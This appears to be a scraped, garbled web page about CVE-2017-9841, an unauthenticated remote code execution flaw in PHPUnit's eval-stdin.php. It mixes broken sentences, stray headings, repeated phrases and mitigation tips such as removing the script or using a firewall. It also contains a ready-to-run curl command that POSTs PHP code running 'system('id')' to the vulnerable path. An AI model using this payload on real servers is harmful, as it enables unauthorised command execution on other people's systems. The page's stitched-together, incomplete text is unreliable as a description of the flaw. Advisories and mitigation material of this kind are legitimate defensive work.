Vendor Phpunit Phpunit Src Util Php Eval-stdin.php Cve
CVE-2017-9841
The vulnerability you are referring to is , a critical unauthenticated Remote Code Execution (RCE) flaw in PHPUnit. It stems from the file Util/PHP/eval-stdin.php incorrectly processing raw HTTP POST data as PHP code. The Vulnerability
- Disable the
eval-stdin.phpscript: Prevent access to theeval-stdin.phpscript by disabling it or removing it from the PHPUnit installation. - Use a Web Application Firewall (WAF): Configure a WAF to detect and block malicious input attempting to exploit the vulnerability.
- Practical impact
With a raw POST body containing any PHP code. vendor phpunit phpunit src util php eval-stdin.php cve
Obtaining the Patch
Affected Versions and Mitigation
curl -X POST http://target.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php \ -d "<?php system('id'); ?>" CVE-2017-9841 The vulnerability you are referring to is
Long term (weeks–months)